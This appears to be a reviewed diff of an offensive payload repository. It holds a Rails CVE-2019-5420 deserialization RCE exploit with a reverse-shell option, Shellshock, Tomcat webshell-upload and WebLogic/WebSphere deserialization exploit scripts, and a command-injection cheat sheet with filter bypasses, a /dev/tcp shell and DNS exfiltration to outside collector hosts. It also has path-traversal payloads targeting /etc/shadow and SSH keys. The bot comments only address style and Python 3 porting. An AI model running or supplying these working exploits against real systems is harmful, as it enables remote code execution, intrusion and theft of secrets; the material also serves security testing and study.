credentials = ActiveSupport::EncryptedConfiguration.new(
config_path: Rails.root.join(credentials_config_path),
key_path: Rails.root.join(credentials_key_path),
env_key: "RAILS_MASTER_KEY",
raise_if_missing_key: true
)
if credentials.secret_key_base != nil
puts "\033[92mOK\033[0m"
puts ""
puts "secret_key_base": credentials.secret_key_base
puts ""
end
puts "[+] Getting reflective command (R) or reverse shell (S) => "
loop do
begin
input = [(print 'Select option R or S: '), gets.rstrip][1]
if input == "R"
puts "Reflective command selected"
command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
elsif input == "S"
puts "Reverse shell selected"
command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
else
puts "No option selected"
abort
end
command_b64 = Base64.encode64(command)
print "[+] Generating payload CVE-2019-5420 => "
secret_key_base = credentials.secret_key_base
key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
secret = key_generator.generate_key("ActiveStorage")
verifier = ActiveSupport::MessageVerifier.new(secret)
if input == "R"
code = "system('bash','-c','" + command + " > /tmp/result.txt')"
else
code = "system('bash','-c','" + command + "')"
end
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
puts "\033[92mOK\033[0m"
puts ""
url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
puts url
puts ""
print "[+] Sending request => "
uri = URI(url)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "500"
puts "\033[92mOK\033[0m"
else
puts "KO"
abort
end
if input == "R"
print "[+] Getting result of command => "
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m\n\n"
puts res.body
puts "\n"
else
puts "KO"
abort
end
end
rescue Exception => e
puts "Exiting..."
abort
end
end
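Review bot: `puts "secret_key_base": credentials.secret_key_base` does not print a label: Ruby parses `"secret_key_base": value` as a one-key symbol hash, so the output is `{:secret_key_base=>"..."}`; `puts "secret_key_base: #{credentials.secret_key_base}"` is what was meant. Other points in this file: `for $i in 0..9` uses a global as the loop iterator and the trailing `$i +=1;` is redundant because `for` reassigns from the range on every pass, so drop the increment and use a local; the two download loops are copy-pasted and should be one method taking the filename. `ENV["RAILS_MASTER_KEY"] = res.body` relies on `res` still holding the master.key response after the loop, which is only true when that loop reached its `break`; guard on it. `rescue Exception => e` swallows `Interrupt` and `SystemExit` and never uses `e`; rescue `StandardError` and print `e.message` so failures are diagnosable. `require "./demo-5.2.1/config/environment"` together with the hardcoded `$remote`, `$proxy_addr` and `$proxy_port` means the script only runs inside one specific demo checkout; document that in a header comment or take them as arguments. Spelling: `$ressource` should be `$resource`.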

18
CVE Exploits/Shellshock CVE-2014-6271.py Executable file → Normal file
@@ -11,22 +11,26 @@
# .. # ..
# ~$ /bin/cat /etc/passwd # ~$ /bin/cat /etc/passwd
import sys, urllib2 from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
import sys, urllib.request, urllib.error, urllib.parse
if len(sys.argv) != 2: if len(sys.argv) != 2:
print "Usage: shell_shocker <URL>" print("Usage: shell_shocker <URL>")
sys.exit(0) sys.exit(0)
URL=sys.argv[1] URL=sys.argv[1]
print "[+] Attempting Shell_Shock - Make sure to type full path" print("[+] Attempting Shell_Shock - Make sure to type full path")
while True: while True:
command=raw_input("~$ ") command=input("~$ ")
opener=urllib2.build_opener() opener=urllib.request.build_opener()
opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
try: try:
response=opener.open(URL) response=opener.open(URL)
for line in response.readlines(): for line in response.readlines():
print line.strip() print(line.strip())
except Exception as e: print e except Exception as e: print(e)
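Review bot: `from future import standard_library` / `standard_library.install_aliases()` and `from builtins import input` make the `future` package a hard requirement on Python 2 and nothing documents it. On Python 3 the imports resolve natively, but `response.readlines()` then yields `bytes`, so `print(line.strip())` prints `b'...'` reprs; decode first (`line.decode(errors='replace').strip()`). `except Exception as e: print(e)` also hides the traceback for genuine bugs in the script; narrow it to `urllib.error.URLError` or re-raise after printing.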

90
CVE Exploits/Tomcat CVE-2017-12617.py Executable file → Normal file
@@ -22,6 +22,10 @@ options:
./cve-2017-12617.py -l hotsts.txt ./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt ./cve-2017-12617.py --list hosts.txt
""" """
from __future__ import print_function
from builtins import input
from builtins import str
from builtins import object
import requests import requests
import re import re
import signal import signal
@@ -34,7 +38,7 @@ from optparse import OptionParser
class bcolors: class bcolors(object):
HEADER = '\033[95m' HEADER = '\033[95m'
OKBLUE = '\033[94m' OKBLUE = '\033[94m'
OKGREEN = '\033[92m' OKGREEN = '\033[92m'
@@ -79,9 +83,9 @@ signal.signal(signal.SIGINT, signal_handler)
def removetags(tags): def removetags(tags):
remove = re.compile('<.*?>') remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags) txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n") return txt.replace("\n\n\n","\n")
def getContent(url,f): def getContent(url,f):
@@ -94,7 +98,7 @@ def createPayload(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers) req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
if req.status_code==201: if req.status_code==201:
print "File Created .." print("File Created ..")
def RCE(url,f): def RCE(url,f):
@@ -130,15 +134,15 @@ def shell(url,f):
while True: while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=raw_input("$ ") cmd=input("$ ")
payload={'cmd':cmd} payload={'cmd':cmd}
if cmd=="q" or cmd=="Q": if cmd=="q" or cmd=="Q":
break break
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers) re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
re=str(re.content) re=str(re.content)
t=removetags(re) t=removetags(re)
print t print(t)
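Review bot: `re=requests.get(...)` shadows the `re` module name inside `shell` (the file imports `re` at the top and `removetags` uses `re.compile`); it still works only because `removetags` looks up the global, so rename the local to `resp` before it bites. Also `str(re.content)` on Python 3 turns `bytes` into the literal string `b'...'`, so `removetags` ends up stripping tags from a repr; use `.text` (already decoded) instead.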
@@ -201,47 +205,35 @@ if opt.U==None and opt.P==None and opt.L==None:
else: else:
if opt.U!=None and opt.P==None and opt.L==None: if opt.U!=None and opt.P==None and opt.L==None:
print bcolors.OKGREEN+banner+bcolors.ENDC print(bcolors.OKGREEN+banner+bcolors.ENDC)
url=str(opt.U) url=str(opt.U)
checker="Poc.jsp" checker="Poc.jsp"
print bcolors.BOLD +"Poc Filename {}".format(checker) print(bcolors.BOLD +"Poc Filename {}".format(checker))
createPayload(str(url)+"/",checker) createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker) con=getContent(str(url)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
print bcolors.WARNING+url+"/"+checker+bcolors.ENDC print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
else: else:
print 'Not Vulnerable to CVE-2017-12617 ' print('Not Vulnerable to CVE-2017-12617 ')
elif opt.P!=None and opt.U!=None and opt.L==None: elif opt.P!=None and opt.U!=None and opt.L==None:
print bcolors.OKGREEN+banner+bcolors.ENDC print(bcolors.OKGREEN+banner+bcolors.ENDC)
pwn=str(opt.P) pwn=str(opt.P)
url=str(opt.U) url=str(opt.U)
print "Uploading Webshell ....." print("Uploading Webshell .....")
pwn=pwn+".jsp" pwn=pwn+".jsp"
RCE(str(url)+"/",pwn) RCE(str(url)+"/",pwn)
shell(str(url),pwn) shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None: elif opt.L!=None and opt.P==None and opt.U==None:
print bcolors.OKGREEN+banner+bcolors.ENDC print(bcolors.OKGREEN+banner+bcolors.ENDC)
w=str(opt.L) w=str(opt.L)
f=open(w,"r") f=open(w,"r")
print "Scaning hosts in {}".format(w) print("Scaning hosts in {}".format(w))
checker="Poc.jsp" checker="Poc.jsp"
for i in f.readlines(): for i in f.readlines():
i=i.strip("\n") i=i.strip("\n")
createPayload(str(i)+"/",checker) createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker) con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
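Review bot: `f=open(w,"r")` is never closed; use `with open(w) as f:` around the `readlines()` loop. The three branches each print `bcolors.OKGREEN+banner+bcolors.ENDC` identically, so hoist that one print above the if/elif chain. Typos in user-facing strings: "Scaning" should be "Scanning", and `it\'s Vulnerable` should be "is vulnerable".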

@@ -4,6 +4,7 @@
#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
#Made with <3 by @byt3bl33d3r #Made with <3 by @byt3bl33d3r
from __future__ import print_function
import socket import socket
import struct import struct
import argparse import argparse
@@ -34,29 +35,29 @@ else:
ysoserial_path = args.ysoserial_path ysoserial_path = args.ysoserial_path
if len(args.target.split(':')) != 2: if len(args.target.split(':')) != 2:
print '[-] Target must be in format IP:PORT' print('[-] Target must be in format IP:PORT')
sys.exit(1) sys.exit(1)
if not args.command: if not args.command:
print '[-] You must specify a command to run' print('[-] You must specify a command to run')
sys.exit(1) sys.exit(1)
ip, port = args.target.split(':') ip, port = args.target.split(':')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[*] Target IP: {}'.format(ip) print('[*] Target IP: {}'.format(ip))
print '[*] Target PORT: {}'.format(port) print('[*] Target PORT: {}'.format(port))
sock.connect((ip, int(port))) sock.connect((ip, int(port)))
# Send headers # Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print '[*] Sending header' print('[*] Sending header')
sock.sendall(headers) sock.sendall(headers)
data = sock.recv(1024) data = sock.recv(1024)
print'[*] Received: "{}"'.format(data) print('[*] Received: "{}"'.format(data))
payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
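Review bot: the `print` conversion alone does not make this file Python 3 compatible: `sock.sendall(headers)` passes a `str` and fails with `TypeError: a bytes-like object is required`, so `headers` needs to be `bytes` (`headers.encode()` or a `b'...'` literal), and `print('[*] Received: "{}"'.format(data))` shows a `b'...'` repr unless `data` is decoded. `check_output(...)` on the last line also returns `bytes`, which matters for how `payloadObj` is combined with the string literals in the next hunk.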
@@ -67,5 +68,5 @@ payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f
# adjust header for appropriate message length # adjust header for appropriate message length
payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
print '[*] Sending payload' print('[*] Sending payload')
sock.send(payload) sock.send(payload)
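Review bot: on Python 3 `struct.pack('!i', len(payload))` returns `bytes`, and `"{0}{1}".format(...)` stringifies it as `b'\x00\x00...'`, so the four-byte length prefix becomes a text repr and `sock.send(payload)` then fails because `payload` is a `str`. Keep the whole payload as `bytes` and concatenate (`struct.pack('!i', len(payload)) + payload[4:]`), and prefer `sendall` to `send` so a partial write is not silently accepted.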

@@ -1,3 +1,5 @@
from __future__ import print_function
from builtins import input
import requests import requests
import sys import sys
@@ -44,18 +46,18 @@ def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500: if result.status_code == 500:
print "Command Executed \n" print("Command Executed \n")
else: else:
print "Something Went Wrong \n" print("Something Went Wrong \n")
print "***************************************************** \n" \ print("***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \ "**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n" "***************************************************** \n")
while 1: while 1:
command_in = raw_input("Eneter your command here: ") command_in = input("Eneter your command here: ")
if command_in == "exit" : exit(0) if command_in == "exit" : exit(0)
do_post(command_in) do_post(command_in)
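Review bot: typo in the prompt, "Eneter" should be "Enter". `exit(0)` should be `sys.exit(0)` (`sys` is imported in the first hunk) and `while 1` reads better as `while True`. The banner is four string literals joined by backslash continuations inside one `print(...)`; a single triple-quoted string would be easier to read and keeps the box aligned.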

2
CVE Exploits/WebLogic CVE-2018-2894.py Executable file → Normal file
@@ -2,6 +2,8 @@
# coding:utf-8 # coding:utf-8
# Build By LandGrey # Build By LandGrey
from __future__ import print_function
from builtins import str
import re import re
import sys import sys
import time import time

@@ -4,6 +4,8 @@
#Based on the nessus plugin websphere_java_serialize.nasl #Based on the nessus plugin websphere_java_serialize.nasl
#Made with <3 by @byt3bl33d3r #Made with <3 by @byt3bl33d3r
from __future__ import print_function
from builtins import chr
import requests import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@@ -34,7 +36,7 @@ if not args.command:
elif args.command: elif args.command:
if len(args.command) > 254: if len(args.command) > 254:
print '[-] Command must be less then 255 bytes' print('[-] Command must be less then 255 bytes')
sys.exit(1) sys.exit(1)
ip, port = args.target.split(':') ip, port = args.target.split(':')
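Review bot: "less then 255 bytes" should be "less than". The check `len(args.command) > 254` also counts characters, not bytes, so a command containing non-ASCII text can pass the check and still exceed the limit the message promises; compare `len(args.command.encode())` instead.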
@@ -75,4 +77,4 @@ headers = {'Content-Type': 'text/xml; charset=utf-8',
'SOAPAction': 'urn:AdminService'} 'SOAPAction': 'urn:AdminService'}
r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False) r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False)
print '[*] HTTPS request sent successfully' print('[*] HTTPS request sent successfully')
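Review bot: the final `print('[*] HTTPS request sent successfully')` is unconditional and hardcodes "HTTPS" even though `args.proto` may be `http`; print `args.proto` and check `r.status_code` (or `r.ok`) before reporting success, otherwise a 4xx/5xx response is reported as if it went through.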

@@ -1,11 +1,40 @@
# Remote Commands Execution # Command Injection
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server. > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Summary
* [Tools](#tools)
* [Exploits](#exploits)
* [Basic commands](#basic-commands)
* [Chaining commands](#chaining-commands)
* [Inside a command](#inside-a-command)
* [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-a-single-quote)
* [Bypass with double quote](#bypass-with-a-double-quote)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-----)
* [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards)
* [Challenge](#challenge)
* [Time based data exfiltration](#time-based-data-exfiltration)
* [DNS based data exfiltration](#dns-based-data-exfiltration)
* [Polyglot command injection](#polyglot-command-injection)
* [References](#references)
## Tools
* [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix)
## Exploits ## Exploits
Normal Commands execution, execute the command and voila :p ### Basic commands
Execute the command and voila :p
```powershell ```powershell
cat /etc/passwd cat /etc/passwd
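Review bot: several Summary anchors do not match the headings they point to. `#bypass-with-a-single-quote` and `#bypass-with-a-double-quote` will not resolve because the headings added later in this file are "#### Bypass with single quote" and "#### Bypass with double quote" (GitHub generates `#bypass-with-single-quote` and `#bypass-with-double-quote`), and `#bypass-with-----` for "Bypass with $@" is almost certainly wrong too: GitHub drops the `$@` characters and produces `#bypass-with-`. Either rename the headings or fix the links. The new definition line "> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application." is a clear improvement over the old "Commandss" sentence.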
@@ -15,7 +44,7 @@ bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
``` ```
Commands execution by chaining commands ### Chaining commands
```powershell ```powershell
original_cmd_by_server; ls original_cmd_by_server; ls
@@ -24,14 +53,18 @@ original_cmd_by_server | ls
original_cmd_by_server || ls Only if the first cmd fail original_cmd_by_server || ls Only if the first cmd fail
``` ```
Commands execution inside a command ### Inside a command
```powershell ```bash
original_cmd_by_server `cat /etc/passwd` original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd) original_cmd_by_server $(cat /etc/passwd)
``` ```
Commands execution without space - Linux ## Filter Bypasses
### Bypass without space
Works on Linux only.
```powershell ```powershell
swissky@crashlab:~/Www$ cat</etc/passwd swissky@crashlab:~/Www$ cat</etc/passwd
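Review bot: fence languages are inconsistent inside one section: `### Inside a command` switches to ```bash, but `### Chaining commands` and `### Bypass without space` keep ```powershell for Linux shell commands (`cat</etc/passwd`, `sh</dev/tcp/...`). Use `bash` (or `sh`) for the Linux blocks and reserve `powershell` for the Windows ones, so that the highlighting agrees with the new "Works on Linux only." note.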
@@ -56,51 +89,57 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242 swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
``` ```
Commands execution without space - Windows
```powershell
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
Commands execution without spaces, $ or { } - Linux (Bash only) Commands execution without spaces, $ or { } - Linux (Bash only)
```powershell ```powershell
IFS=,;`cat<<<uname,-a` IFS=,;`cat<<<uname,-a`
``` ```
Commands execution with a line return Works on Windows only.
```powershell
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
### Bypass with a line return
```powershell ```powershell
something%0Acat%20/etc/passwd something%0Acat%20/etc/passwd
``` ```
Bypass blacklisted word with single quote ### Bypass Blacklisted words
#### Bypass with single quote
```powershell ```powershell
w'h'o'am'i w'h'o'am'i
``` ```
Bypass blacklisted word with double quote #### Bypass with double quote
```powershell ```powershell
w"h"o"am"i w"h"o"am"i
``` ```
Bypass blacklisted word with backslash and slash #### Bypass with backslash and slash
```powershell ```powershell
w\ho\am\i w\ho\am\i
/\b\i\n/////s\h /\b\i\n/////s\h
``` ```
Bypass blacklisted word with $@ #### Bypass with $@
```powershell ```powershell
who$@ami who$@ami
echo $0
-> /usr/bin/zsh
echo whoami|$0
``` ```
Bypass blacklisted word with variable expansion #### Bypass with variable expansion
```powershell ```powershell
/???/??t /???/p??s?? /???/??t /???/p??s??
@@ -110,12 +149,11 @@ cat ${test//hhh\/hm/}
cat ${test//hh??hm/} cat ${test//hh??hm/}
``` ```
Bypass zsh/bash/sh blacklist #### Bypass with wildcards
```powershell ```powershell
echo $0 powershell C:\*\*2\n??e*d.*? # notepad
-> /usr/bin/zsh @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
echo whoami|$0
``` ```
## Challenge ## Challenge
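Review bot: `#### Bypass with $@` now mixes two unrelated tricks. `who$@ami` relies on the empty `$@` expansion, while `echo whoami|$0` (moved here from the former "Bypass zsh/bash/sh blacklist" section) works because `$0` names the running shell and has nothing to do with `$@`; keep `$0` under its own heading or add a one-line comment. The output line `-> /usr/bin/zsh` sits between commands inside the fence; make it `# -> /usr/bin/zsh` so the block contains only commands. In `#### Bypass with wildcards`, `@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e` uses cmd.exe caret escaping and Windows path wildcards but the block is fenced as `powershell`; label it as cmd and add "Works on Windows only." as the space-bypass section now does.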
@@ -149,10 +187,39 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
```powershell ```powershell
1. Go to http://dnsbin.zhack.ca/ 1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls' 2. Execute a simple 'ls'
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
``` ```
## Thanks to ```powershell
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
## Polyglot command injection
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
```bash
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
e.g:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
```
## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
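Review bot: changing `host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"` to `host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"` is the right fix (`host` resolves a name, not a URL), but the fence still mixes the prose steps `1. Go to http://dnsbin.zhack.ca/` / `2. Execute a simple 'ls'` with the loop; move the steps out of the fence. The same applies to both polyglot blocks, where the `e.g:` line is neither a command nor a comment; write `# e.g.` so the fence is paste-safe. The added `$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)` line is undocumented: say what it demonstrates (the first line of `wget -h` output, with spaces and commas turned into hyphens and dots removed, is resolved as a subdomain label) and whose collector `sudo.co.il` is, or point at the `dnsbin.zhack.ca` / `pingb.in` tools listed just below instead.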

@@ -0,0 +1,156 @@
# Directory traversal
> A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
## Summary
* [Tools](#tools)
* [Basic exploitation](#basic-exploitation)
* [16 bits Unicode encoding](#)
* [UTF-8 Unicode encoding](#)
* [Bypass "../" replaced by ""](#)
* [Double URL encoding](#)
* [UNC Bypass](#unc-bypass)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#)
* [Interesting Windows files](#)
## Tools
- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn)
```powershell
git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
```
## Basic exploitation
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
```powershell
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
```
### 16 bits Unicode encoding
```powershell
. = %u002e
/ = %u2215
\ = %u2216
```
### UTF-8 Unicode encoding
```powershell
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```
### Bypass "../" replaced by ""
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
```powershell
..././
...\.\
```
### Double URL encoding
```powershell
. = %252e
/ = %252f
\ = %255c
```
### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
```powershell
\\localhost\c$\windows\win.ini
```
## Path Traversal
### Interesting Linux files
```powershell
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
```
### Interesting Windows files
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
```powershell
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
```
The following log files are controllable and can be included with an evil payload to achieve a command execution
```powershell
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```
## References
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
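Review bot: six Summary entries link to the empty anchor `(#)` (`16 bits Unicode encoding`, `UTF-8 Unicode encoding`, `Bypass "../" replaced by ""`, `Double URL encoding`, `Interesting Linux files`, `Interesting Windows files`); fill in the slugs. The Windows list repeats `c:/sysprep.inf`, `c:/sysprep.xml`, `c:/sysprep/sysprep.inf`, `c:/sysprep/sysprep.xml` and `c:/system32/inetsrv/metabase.xml` twice. The closing block introduced by "The following log files are controllable and can be included with an evil payload" contains Linux paths but falls under `### Interesting Windows files`, and the topic (log poisoning) belongs to the File Inclusion page; give it its own heading or a link to that page. Grammar: "consists in exploiting" → "consists of exploiting"; "a WAF which remove" → "a WAF which removes".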

@@ -666,6 +666,18 @@ users/.htpasswd
/var/log/news/news.notice /var/log/news/news.notice
/var/log/news/suck.err /var/log/news/suck.err
/var/log/news/suck.notice /var/log/news/suck.notice
/var/log/nginx/access_log
/var/log/nginx/access.log
../../../../../../../var/log/nginx/access_log
../../../../../../../var/log/nginx/access.log
../../../../../var/log/nginx/access_log
../../../../../var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log
../../../../../../../var/log/nginx/error_log
../../../../../../../var/log/nginx/error.log
../../../../../var/log/nginx/error_log
../../../../../var/log/nginx/error.log
/var/log/poplog /var/log/poplog
/var/log/POPlog /var/log/POPlog
/var/log/proftpd /var/log/proftpd

